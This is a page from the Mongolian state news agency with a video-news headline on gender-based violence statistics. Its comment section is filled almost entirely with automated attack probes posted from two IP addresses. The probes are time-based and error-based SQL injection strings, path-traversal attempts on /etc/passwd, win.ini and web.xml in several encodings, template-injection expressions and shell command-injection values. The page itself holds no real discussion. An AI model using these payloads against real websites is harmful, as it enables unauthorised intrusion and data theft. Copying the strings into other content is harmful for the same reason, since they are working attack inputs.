Монгол Улсад жендэрт суурилсан хүчирхийллийн хохирогчдын 90 орчим хувь нь охид, эмэгтэйчүүд байна

ВИДЕО МЭДЭЭ
montastudio@montsame.gov.mn
2022-11-29 14:22:03
Холбоотой мэдээ
Сэтгэгдлүүд
 • ../../../../WEB-INF/web.xml;admin 185.234.72.114 284 өдөр

  123456
 • ../../../../WEB-INF/web.xml 185.234.72.114 284 өдөр

  123456
 • ../../../WEB-INF/web.xml;admin 185.234.72.114 284 өдөр

  123456
 • ../../../WEB-INF/web.xml 185.234.72.114 284 өдөр

  123456
 • ../../WEB-INF/web.xml;admin 185.234.72.114 284 өдөр

  123456
 • ../../WEB-INF/web.xml 185.234.72.114 284 өдөр

  123456
 • admin'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('h',6)='h 185.234.72.114 284 өдөр

  123456
 • ../WEB-INF/web.xml;admin 185.234.72.114 284 өдөр

  123456
 • admin'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('g',0)='g 185.234.72.114 284 өдөр

  123456
 • ../WEB-INF/web.xml 185.234.72.114 284 өдөр

  123456
 • admin'"\( 185.234.72.114 284 өдөр

  123456
 • admin'and(select+1)>0waitfor/**/delay'0:0:6 185.234.72.114 284 өдөр

  123456
 • WEB-INF/web.xml;admin 185.234.72.114 284 өдөр

  123456
 • admin鎈'"\( 185.234.72.114 284 өдөр

  123456
 • admin'and(select+1)>0waitfor/**/delay'0:0:0 185.234.72.114 284 өдөр

  123456
 • WEB-INF/web.xml 185.234.72.114 284 өдөр

  123456
 • admin'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1194268513')))>'0 185.234.72.114 284 өдөр

  123456
 • admin'/**/and(select'1'from/**/pg_sleep(6))::text>'0 185.234.72.114 284 өдөр

  123456
 • %u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215Windows%u2215win%u002eini 185.234.72.114 284 өдөр

  123456
 • convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1982030722'))) 185.234.72.114 284 өдөр

  123456
 • admin'/**/and(select'1'from/**/pg_sleep(0))::text>'0 185.234.72.114 284 өдөр

  123456
 • %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fWindows%2fwin%2eini 185.234.72.114 284 өдөр

  123456
 • admin/**/and/**/cast(md5('1399035852')as/**/int)>0 185.234.72.114 284 өдөр

  123456
 • admin"and(select*from(select+sleep(6))a/**/union/**/select+1)=" 185.234.72.114 284 өдөр

  123456
 • admin'and(select'1'from/**/cast(md5(1274216336)as/**/int))>'0 185.234.72.114 284 өдөр

  123456
 • ../../../../../../Windows/win.iniadmin 185.234.72.114 284 өдөр

  123456
 • admin"and(select*from(select+sleep(0))a/**/union/**/select+1)=" 185.234.72.114 284 өдөр

  123456
 • extractvalue(1,concat(char(126),md5(1104275415))) 185.234.72.114 284 өдөр

  123456
 • ./../../../../../../Windows/win.ini 185.234.72.114 284 өдөр

  123456
 • admin'and(select*from(select+sleep(6))a/**/union/**/select+1)=' 185.234.72.114 284 өдөр

  123456
 • admin"and/**/extractvalue(1,concat(char(126),md5(1316467479)))and" 185.234.72.114 284 өдөр

  123456
 • ../../../../../../Windows/win.ini 185.234.72.114 284 өдөр

  123456
 • admin'and(select*from(select+sleep(0))a/**/union/**/select+1)=' 185.234.72.114 284 өдөр

  123456
 • admin'and/**/extractvalue(1,concat(char(126),md5(1231692107)))and' 185.234.72.114 284 өдөр

  123456
 • admin 185.234.72.114 284 өдөр

  123456'"\(
 • admin 185.234.72.114 284 өдөр

  123456鎈'"\(
 • admin"and"k"="t 185.234.72.114 284 өдөр

  123456
 • admin"and"t"="t 185.234.72.114 284 өдөр

  123456
 • admin 185.234.72.114 284 өдөр

  123456'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1621736065')))>'0
 • ../../../../../../../../../../../../../../../../../../Windows/win.iniadmin 185.234.72.114 284 өдөр

  123456
 • ./../../../../../../../../../../../../../../../../../../Windows/win.ini 185.234.72.114 284 өдөр

  123456
 • admin'and'p'='r 185.234.72.114 284 өдөр

  123456
 • admin 185.234.72.114 284 өдөр

  convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1808267389')))
 • ../../../../../../../../../../../../../../../../../../Windows/win.ini 185.234.72.114 284 өдөр

  123456
 • admin 185.234.72.114 284 өдөр

  123456/**/and/**/cast(md5('1839134942')as/**/int)>0
 • admin'and'c'='c 185.234.72.114 284 өдөр

  123456
 • %u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216Windows%u2216win%u002eini 185.234.72.114 284 өдөр

  123456
 • admin 185.234.72.114 284 өдөр

  123456'and(select'1'from/**/cast(md5(1385805221)as/**/int))>'0
 • admin 185.234.72.114 284 өдөр

  123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('m',6)='m
 • %2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cWindows%5cwin%2eini 185.234.72.114 284 өдөр

  123456
 • admin 185.234.72.114 284 өдөр

  123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('b',0)='b
 • ..\..\..\..\..\..\Windows\win.iniadmin 185.234.72.114 284 өдөр

  123456
 • admin 185.234.72.114 284 өдөр

  extractvalue(1,concat(char(126),md5(1567826316)))
 • admin 185.234.72.114 284 өдөр

  123456/**/and/**/0=DBMS_PIPE.RECEIVE_MESSAGE('d',6)
 • .\..\..\..\..\..\..\Windows\win.ini 185.234.72.114 284 өдөр

  123456
 • admin 185.234.72.114 284 өдөр

  123456"and/**/extractvalue(1,concat(char(126),md5(1780316495)))and"
 • admin 185.234.72.114 284 өдөр

  123456/**/and/**/1=DBMS_PIPE.RECEIVE_MESSAGE('k',0)
 • admin 185.234.72.114 284 өдөр

  123456'and(select+1)>0waitfor/**/delay'0:0:6
 • admin 185.234.72.114 284 өдөр

  123456'and/**/extractvalue(1,concat(char(126),md5(1599834843)))and'
 • ..\..\..\..\..\..\Windows\win.ini 185.234.72.114 284 өдөр

  123456
 • admin 185.234.72.114 284 өдөр

  123456'and(select+1)>0waitfor/**/delay'0:0:0
 • admin 185.234.72.114 284 өдөр

  123456/**/and(select+1)>0waitfor/**/delay'0:0:6'/**/
 • admin 185.234.72.114 284 өдөр

  123456/**/and(select+1)>0waitfor/**/delay'0:0:0'/**/
 • admin 185.234.72.114 284 өдөр

  123456'/**/and(select'1'from/**/pg_sleep(6))::text>'0
 • admin 185.234.72.114 284 өдөр

  123456'/**/and(select'1'from/**/pg_sleep(0))::text>'0
 • admin 185.234.72.114 284 өдөр

  123456/**/and(select+1/**/from/**/pg_sleep(6))>0/**/
 • ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.iniadmin 185.234.72.114 284 өдөр

  123456
 • admin 185.234.72.114 284 өдөр

  123456/**/and(select+1/**/from/**/pg_sleep(0))>0/**/
 • .\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.ini 185.234.72.114 284 өдөр

  123456
 • admin 185.234.72.114 284 өдөр

  123456"and(select*from(select+sleep(7))a/**/union/**/select+1)="
 • admin 185.234.72.114 284 өдөр

  123456"and(select*from(select+sleep(6))a/**/union/**/select+1)="
 • ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.ini 185.234.72.114 284 өдөр

  123456
 • %u2215etc%u2215passwd 185.234.72.114 284 өдөр

  123456
 • admin 185.234.72.114 284 өдөр

  123456"and(select*from(select+sleep(0))a/**/union/**/select+1)="
 • %2fetc%2fpasswd 185.234.72.114 284 өдөр

  123456
 • admin 185.234.72.114 284 өдөр

  123456'and(select*from(select+sleep(6))a/**/union/**/select+1)='
 • /etc/passwdadmin 185.234.72.114 284 өдөр

  123456
 • admin 185.234.72.114 284 өдөр

  123456'and(select*from(select+sleep(0))a/**/union/**/select+1)='
 • admin 185.234.72.114 284 өдөр

  (select*from(select+sleep(6)union/**/select+1)a)
 • /etc/passwd 185.234.72.114 284 өдөр

  123456
 • <%- 825523791+973457184 %> 185.234.72.114 284 өдөр

  123456
 • admin 185.234.72.114 284 өдөр

  (select*from(select+sleep(0)union/**/select+1)a)
 • %u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215etc%u2215passwd 185.234.72.114 284 өдөр

  123456
 • #set($c=824468827+913470467)${c}$c 185.234.72.114 284 өдөр

  123456
 • expr 838217853 + 909991528 185.234.72.114 284 өдөр

  123456
 • admin 185.234.72.114 284 өдөр

  123456
 • %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd 185.234.72.114 284 өдөр

  123456
 • ${(860336626+979437208)?c} 185.234.72.114 284 өдөр

  123456
 • admin&set /A 820619405+958315755 185.234.72.114 284 өдөр

  123456
 • ${826309457+828069450} 185.234.72.114 284 өдөр

  123456
 • ./../../../../../../etc/passwd 185.234.72.114 284 өдөр

  123456
 • admin 185.234.72.114 284 өдөр

  123456
 • admin$(expr 957407983 + 830002675) 185.234.72.114 284 өдөр

  123456
 • /*1*/{{875303911+840176372}} 185.234.72.114 284 өдөр

  123456
 • ../../../../../../etc/passwdadmin 185.234.72.114 284 өдөр

  123456
 • admin 185.234.72.114 284 өдөр

  123456
 • admin|expr 947683921 + 804164365 185.234.72.114 284 өдөр

  123456
 • admin 185.234.72.114 284 өдөр

  <%- 824057388+925682351 %>
 • ../../../../../../etc/passwd 185.234.72.114 284 өдөр

  123456
 • admin 185.234.72.114 284 өдөр

  123456"and"e"="f
 • admin expr 829840350 + 835536157 185.234.72.114 284 өдөр

  123456
 • admin 185.234.72.114 284 өдөр

  123456"and"g"="g
 • admin 185.234.72.114 284 өдөр

  expr 964758627 + 867111492
 • admin 185.234.72.114 284 өдөр

  123456'and'n'='g
 • admin 185.234.72.114 284 өдөр

  123456'and'w'='w
 • '-var_dump(md5(238990535))-' 185.234.72.114 284 өдөр

  123456
 • admin 185.234.72.114 284 өдөр

  123456&set /A 881639371+811240638
 • admin 185.234.72.114 284 өдөр

  #set($c=848717641+913810824)${c}$c
 • ${@var_dump(md5(574462210))}; 185.234.72.114 284 өдөр

  123456
 • admin 185.234.72.114 284 өдөр

  123456
 • admin 185.234.72.114 284 өдөр

  123456$(expr 857058807 + 850987319)
 • admin 185.234.72.114 284 өдөр

  123456/**/and+1=7
 • admin 185.234.72.114 284 өдөр

  '-var_dump(md5(923609754))-'
 • admin 185.234.72.114 284 өдөр

  123456
 • uyscfbuxmwlskyckpxgh 185.234.72.114 284 өдөр

  123456
 • admin 185.234.72.114 284 өдөр

  123456|expr 822357998 + 860308182
 • admin 185.234.72.114 284 өдөр

  123456/**/and+2=2
 • admin 185.234.72.114 284 өдөр

  ${(996050113+815742705)?c}
 • admin 185.234.72.114 284 өдөр

  ${@var_dump(md5(772240187))};
 • admin 185.234.72.114 284 өдөр

  ${850243308+822867548}
 • admin 185.234.72.114 284 өдөр

  123456
 • admin 185.234.72.114 284 өдөр

  123456 expr 879019609 + 813495249
 • admin 185.234.72.114 284 өдөр

  123456
 • ./../../../../../../../../../../../../../../../../../../etc/passwd 185.234.72.114 284 өдөр

  123456
 • admin 185.234.72.114 284 өдөр

  123456
 • ../../../../../../../../../../../../../../../../../../etc/passwdadmin 185.234.72.114 284 өдөр

  123456
 • admin 185.234.72.114 284 өдөр

  uyscfbuxmwlskyckpxgh
 • ${935941284+827674435} 185.234.72.114 284 өдөр

  123456
 • admin 185.234.72.114 284 өдөр

  ${834027954+837532851}
 • admin 185.234.72.114 284 өдөр

  /*1*/{{955173329+902847884}}
 • admin 185.234.72.114 284 өдөр

  123456
 • ../../../../../../../../../../../../../../../../../../etc/passwd 185.234.72.114 284 өдөр

  123456
 • admin 185.234.72.114 284 өдөр

  123456
 • admin'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('w',12)='w 194.163.191.42 284 өдөр

  123456
 • admin'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('g',0)='g 194.163.191.42 284 өдөр

  123456
 • admin'and(select+1)>0waitfor/**/delay'0:0:12 194.163.191.42 284 өдөр

  123456
 • admin'and(select+1)>0waitfor/**/delay'0:0:0 194.163.191.42 284 өдөр

  123456
 • admin'/**/and(select'1'from/**/pg_sleep(12))::text>'0 194.163.191.42 284 өдөр

  123456
 • admin'/**/and(select'1'from/**/pg_sleep(0))::text>'0 194.163.191.42 284 өдөр

  123456
 • admin"and(select*from(select+sleep(12))a/**/union/**/select+1)=" 194.163.191.42 284 өдөр

  123456
 • admin"and(select*from(select+sleep(0))a/**/union/**/select+1)=" 194.163.191.42 284 өдөр

  123456
 • admin'and(select*from(select+sleep(12))a/**/union/**/select+1)=' 194.163.191.42 284 өдөр

  123456
 • admin'and(select*from(select+sleep(0))a/**/union/**/select+1)=' 194.163.191.42 284 өдөр

  123456
 • admin"and"a"="s 194.163.191.42 284 өдөр

  123456
 • admin"and"l"="l 194.163.191.42 284 өдөр

  123456
 • admin'and'c'='k 194.163.191.42 284 өдөр

  123456
 • admin'and'g'='g 194.163.191.42 284 өдөр

  123456
 • admin 194.163.191.42 284 өдөр

  123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('l',12)='l
 • admin 194.163.191.42 284 өдөр

  123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('s',0)='s
 • ../../../../WEB-INF/web.xml;admin 194.163.191.42 284 өдөр

  123456
 • admin 194.163.191.42 284 өдөр

  123456/**/and/**/2=DBMS_PIPE.RECEIVE_MESSAGE('v',12)
 • ../../../../WEB-INF/web.xml 194.163.191.42 284 өдөр

  123456
 • admin 194.163.191.42 284 өдөр

  123456/**/and/**/0=DBMS_PIPE.RECEIVE_MESSAGE('u',0)
 • admin 194.163.191.42 284 өдөр

  123456'and(select+1)>0waitfor/**/delay'0:0:12
 • ../../../WEB-INF/web.xml;admin 194.163.191.42 284 өдөр

  123456
 • ../../../WEB-INF/web.xml 194.163.191.42 284 өдөр

  123456
 • admin 194.163.191.42 284 өдөр

  123456'and(select+1)>0waitfor/**/delay'0:0:0
 • admin 194.163.191.42 284 өдөр

  123456/**/and(select+1)>0waitfor/**/delay'0:0:12'/**/
 • ../../WEB-INF/web.xml;admin 194.163.191.42 284 өдөр

  123456
 • admin 194.163.191.42 284 өдөр

  123456/**/and(select+1)>0waitfor/**/delay'0:0:0'/**/
 • ../../WEB-INF/web.xml 194.163.191.42 284 өдөр

  123456
 • admin 194.163.191.42 284 өдөр

  123456'/**/and(select'1'from/**/pg_sleep(12))::text>'0
 • admin 194.163.191.42 284 өдөр

  123456'/**/and(select'1'from/**/pg_sleep(0))::text>'0
 • ../WEB-INF/web.xml;admin 194.163.191.42 284 өдөр

  123456
 • ../WEB-INF/web.xml 194.163.191.42 284 өдөр

  123456
 • admin 194.163.191.42 284 өдөр

  123456/**/and(select+1/**/from/**/pg_sleep(12))>0/**/
 • admin 194.163.191.42 284 өдөр

  123456/**/and(select+1/**/from/**/pg_sleep(0))>0/**/
 • admin 194.163.191.42 284 өдөр

  123456"and(select*from(select+sleep(12))a/**/union/**/select+1)="
 • WEB-INF/web.xml;admin 194.163.191.42 284 өдөр

  123456
 • admin 194.163.191.42 284 өдөр

  123456"and(select*from(select+sleep(0))a/**/union/**/select+1)="
 • WEB-INF/web.xml 194.163.191.42 284 өдөр

  123456
 • admin 194.163.191.42 284 өдөр

  123456'and(select*from(select+sleep(12))a/**/union/**/select+1)='
 • %u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215Windows%u2215win%u002eini 194.163.191.42 284 өдөр

  123456
 • admin 194.163.191.42 284 өдөр

  123456'and(select*from(select+sleep(0))a/**/union/**/select+1)='
 • %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fWindows%2fwin%2eini 194.163.191.42 284 өдөр

  123456
 • ../../../../../../Windows/win.iniadmin 194.163.191.42 284 өдөр

  123456
 • admin 194.163.191.42 284 өдөр

  (select*from(select+sleep(12)union/**/select+1)a)
 • admin 194.163.191.42 284 өдөр

  123456'"\(
 • ./../../../../../../Windows/win.ini 194.163.191.42 284 өдөр

  123456
 • admin 194.163.191.42 284 өдөр

  123456鎈'"\(
 • admin 194.163.191.42 284 өдөр

  (select*from(select+sleep(0)union/**/select+1)a)
 • ../../../../../../Windows/win.ini 194.163.191.42 284 өдөр

  123456
 • admin 194.163.191.42 284 өдөр

  123456'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1666154244')))>'0
 • admin 194.163.191.42 284 өдөр

  123456"and"v"="s
 • admin 194.163.191.42 284 өдөр

  123456"and"a"="a
 • admin 194.163.191.42 284 өдөр

  convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1508494833')))
 • admin 194.163.191.42 284 өдөр

  123456'and'z'='r
 • admin 194.163.191.42 284 өдөр

  123456/**/and/**/cast(md5('1961299640')as/**/int)>0
 • admin 194.163.191.42 284 өдөр

  123456'and'i'='i
 • admin 194.163.191.42 284 өдөр

  123456'and(select'1'from/**/cast(md5(1451854450)as/**/int))>'0
 • admin 194.163.191.42 284 өдөр

  123456/**/and+4=9
 • admin 194.163.191.42 284 өдөр

  extractvalue(1,concat(char(126),md5(1952639686)))
 • admin 194.163.191.42 284 өдөр

  123456/**/and+2=2
 • admin 194.163.191.42 284 өдөр

  123456"and/**/extractvalue(1,concat(char(126),md5(1818202297)))and"
 • admin 194.163.191.42 284 өдөр

  123456'and/**/extractvalue(1,concat(char(126),md5(1088003570)))and'
 • ../../../../../../../../../../../../../../../../../../Windows/win.iniadmin 194.163.191.42 284 өдөр

  123456
 • ./../../../../../../../../../../../../../../../../../../Windows/win.ini 194.163.191.42 284 өдөр

  123456
 • ../../../../../../../../../../../../../../../../../../Windows/win.ini 194.163.191.42 284 өдөр

  123456
 • %u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216Windows%u2216win%u002eini 194.163.191.42 284 өдөр

  123456
 • %2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cWindows%5cwin%2eini 194.163.191.42 284 өдөр

  123456
 • ..\..\..\..\..\..\Windows\win.iniadmin 194.163.191.42 284 өдөр

  123456
 • .\..\..\..\..\..\..\Windows\win.ini 194.163.191.42 284 өдөр

  123456
 • ..\..\..\..\..\..\Windows\win.ini 194.163.191.42 284 өдөр

  123456
 • admin 194.163.191.42 284 өдөр

  expr 812381835 + 872589013
 • <%- 956695338+829074169 %> 194.163.191.42 284 өдөр

  123456
 • admin 194.163.191.42 284 өдөр

  123456&set /A 878721126+916584191
 • #set($c=835968109+898576008)${c}$c 194.163.191.42 284 өдөр

  123456
 • admin 194.163.191.42 284 өдөр

  123456$(expr 914066912 + 914167816)
 • ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.iniadmin 194.163.191.42 284 өдөр

  123456
 • .\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.ini 194.163.191.42 284 өдөр

  123456
 • ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.ini 194.163.191.42 284 өдөр

  123456
 • ${(967040822+839286597)?c} 194.163.191.42 284 өдөр

  123456
 • admin'"\( 194.163.191.42 284 өдөр

  123456
 • admin 194.163.191.42 284 өдөр

  123456
 • admin鎈'"\( 194.163.191.42 284 өдөр

  123456
 • admin 194.163.191.42 284 өдөр

  123456|expr 862666761 + 859455856
 • ${809128105+898558436} 194.163.191.42 284 өдөр

  123456
 • %u2215etc%u2215passwd 194.163.191.42 284 өдөр

  123456
 • admin'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1174064689')))>'0 194.163.191.42 284 өдөр

  123456
 • %2fetc%2fpasswd 194.163.191.42 284 өдөр

  123456
 • admin 194.163.191.42 284 өдөр

  123456 expr 896524964 + 836099958
 • admin 194.163.191.42 284 өдөр

  123456
 • convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1368726836'))) 194.163.191.42 284 өдөр

  123456
 • /etc/passwdadmin 194.163.191.42 284 өдөр

  123456
 • /*1*/{{830796344+872979398}} 194.163.191.42 284 өдөр

  123456
 • admin/**/and/**/cast(md5('1224691175')as/**/int)>0 194.163.191.42 284 өдөр

  123456
 • /etc/passwd 194.163.191.42 284 өдөр

  123456
 • admin 194.163.191.42 284 өдөр

  123456
 • %u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215etc%u2215passwd 194.163.191.42 284 өдөр

  123456
 • admin 194.163.191.42 284 өдөр

  <%- 924500958+974922736 %>
 • %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd 194.163.191.42 284 өдөр

  123456
 • admin'and(select'1'from/**/cast(md5(1211292633)as/**/int))>'0 194.163.191.42 284 өдөр

  123456
 • ./../../../../../../etc/passwd 194.163.191.42 284 өдөр

  123456
 • admin 194.163.191.42 284 өдөр

  #set($c=850913346+864636556)${c}$c
 • admin 194.163.191.42 284 өдөр

  ${(953439898+947594263)?c}
 • extractvalue(1,concat(char(126),md5(1695423728))) 194.163.191.42 284 өдөр

  123456
 • admin 194.163.191.42 284 өдөр

  ${829686256+955995298}
 • '-var_dump(md5(467708712))-' 194.163.191.42 284 өдөр

  123456
 • admin"and/**/extractvalue(1,concat(char(126),md5(1863174198)))and" 194.163.191.42 284 өдөр

  123456
 • admin 194.163.191.42 284 өдөр

  123456
 • admin 194.163.191.42 284 өдөр

  /*1*/{{834383327+958550394}}
 • ${@var_dump(md5(623408737))}; 194.163.191.42 284 өдөр

  123456
 • ../../../../../../etc/passwdadmin 194.163.191.42 284 өдөр

  123456
 • admin 194.163.191.42 284 өдөр

  '-var_dump(md5(553571173))-'
 • expr 821353234 + 936924393 194.163.191.42 284 өдөр

  123456
 • admin'and/**/extractvalue(1,concat(char(126),md5(1205551029)))and' 194.163.191.42 284 өдөр

  123456
 • ../../../../../../etc/passwd 194.163.191.42 284 өдөр

  123456
 • admin&set /A 906572454+854434669 194.163.191.42 284 өдөр

  123456
 • tfzpmixipxsknnlgdmmj 194.163.191.42 284 өдөр

  123456
 • admin 194.163.191.42 284 өдөр

  123456
 • admin 194.163.191.42 284 өдөр

  123456
 • admin$(expr 924294978 + 929455688) 194.163.191.42 284 өдөр

  123456
 • admin|expr 835258041 + 822534916 194.163.191.42 284 өдөр

  123456
 • admin 194.163.191.42 284 өдөр

  ${@var_dump(md5(599020536))};
 • ./../../../../../../../../../../../../../../../../../../etc/passwd 194.163.191.42 284 өдөр

  123456
 • admin 194.163.191.42 284 өдөр

  123456
 • ../../../../../../../../../../../../../../../../../../etc/passwdadmin 194.163.191.42 284 өдөр

  123456
 • admin 194.163.191.42 284 өдөр

  123456
 • admin 194.163.191.42 284 өдөр

  123456
 • admin 194.163.191.42 284 өдөр

  tfzpmixipxsknnlgdmmj
 • ${976288924+956425189} 194.163.191.42 284 өдөр

  123456
 • ../../../../../../../../../../../../../../../../../../etc/passwd 194.163.191.42 284 өдөр

  123456
 • admin expr 905700873 + 907597814 194.163.191.42 284 өдөр

  123456
 • admin 194.163.191.42 284 өдөр

  ${872724971+994906581}
 • admin 194.163.191.42 284 өдөр

  123456